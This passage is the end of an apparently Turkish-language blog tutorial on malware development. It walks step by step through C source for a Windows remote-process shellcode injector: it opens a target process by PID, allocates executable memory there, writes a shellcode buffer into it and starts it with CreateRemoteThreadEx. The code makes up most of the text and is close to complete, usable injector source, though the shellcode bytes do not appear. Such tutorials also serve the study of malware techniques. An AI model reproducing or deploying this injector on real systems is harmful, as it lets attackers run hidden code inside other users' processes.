</span></span><span class="line"><span class="cl">    <span class="n">HANDLE</span>      <span class="n">HandleProcess</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">HANDLE</span>      <span class="n">HandleThread</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">LPVOID</span>      <span class="n">RemoteBuffer</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span></code></pre></div><p>Programın çalıştırılmasından ardından ilk olarak main içerisinde argc değişkenini kontrol ediyoruz. Bu değişken, programın çalıştırılmasında verilen argüman sayısını tutar. Eğer argc değişkeni 2&rsquo;den küçükse, programın doğru kullanımını ekrana bastırıp -1 ile programı return ediyoruz.</p>
<p>Daha sonra malware&rsquo;in çalıştırılması için gereken değişkenleri oluşturuyoruz:</p>
<ul>
<li><strong>PID:</strong> Bu değişken, hedef process&rsquo;in PID&rsquo;sini tutar.</li>
<li><strong>HandleProcess:</strong> Bu değişken, hedef process&rsquo;in handle&rsquo;ini tutmak için kullanılır.</li>
<li><strong>HandleThread:</strong> Bu değişken, hedef process&rsquo;te oluşturulacak thread&rsquo;ın handle&rsquo;ını tutmak için kullanılır.</li>
<li><strong>RemoteBuffer:</strong> Bu değişken, hedef process&rsquo;te oluşturulacak shellcode&rsquo;un adresini tutmak için kullanılır.</li>
</ul>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">HandleProcess</span> <span class="o">=</span> <span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="n">FALSE</span><span class="p">,</span> <span class="n">PID</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">HandleProcess</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Open Target Process! Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Bu kısımda, hedef process&rsquo;in handle&rsquo;ını alıyoruz. Yani hedef programa erişim sağlıyoruz gibi düşünebilirsiniz. Eğer hedef process&rsquo;in handle&rsquo;ını alamazsak, hata mesajı ekrana bastırıp -1 ile programı return ediyoruz.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">RemoteBuffer</span> <span class="o">=</span> <span class="nf">VirtualAllocEx</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">Shellcode</span><span class="p">),</span> <span class="p">(</span><span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">),</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">RemoteBuffer</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Allocated Memory for DLL! Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">    <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Daha sonra hedef process&rsquo;in bellek alanında, shellcode&rsquo;u tutacak bir alan rezerve ediyoruz. Eğer bu işlem başarısız olursa, hata mesajı ekrana bastırıp -1 ile programı return ediyoruz.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nf">WriteProcessMemory</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="n">RemoteBuffer</span><span class="p">,</span> <span class="n">Shellcode</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">Shellcode</span><span class="p">),</span> <span class="mi">0</span><span class="p">)))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to write dllPath to Allocated Memory Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">    <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Bu kısımda, hedef process&rsquo;in bellek alanına shellcode&rsquo;u yazıyoruz. Eğer bu işlem başarısız olursa, hata mesajı ekrana bastırıp -1 ile programı return ediyoruz.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">HandleThread</span> <span class="o">=</span> <span class="nf">CreateRemoteThreadEx</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">RemoteBuffer</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">HandleThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Create Thread! Error Code: 0x%lx</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">    <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">HandleThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleThread</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Bu kısımda ise hedef process&rsquo;te yeni bir thread oluşturuyoruz. Bu thread, hedef process&rsquo;in bellek alanında bulunan shellcode&rsquo;u çalıştıracaktır. Eğer bu işlem başarısız olursa, hata mesajı ekrana bastırıp -1 ile programı return ediyoruz.</p>
<p>Son olarak ise WaitForSingleObject aracılığıyla oluşturduğumuz thread&rsquo;ın bitmesini bekliyoruz ve ardından hedef process&rsquo;in handle&rsquo;larını serbest bırakıyoruz.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/0xbekoo" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://x.com/0xbekooo" target="_blank" rel="noopener noreferrer me"
    title="Twitter">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z">
    </path>
</svg>
</a>
<a href="https://linkedin.com/in/berkayykarakocc" target="_blank" rel="noopener noreferrer me"
    title="Linkedin">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path>
    <rect x="2" y="9" width="4" height="12"></rect>
    <circle cx="4" cy="4" r="2"></circle>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2024 bekoo.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script async src="http://localhost:1313/js/main.js" ></script>

    

</body>
</html>
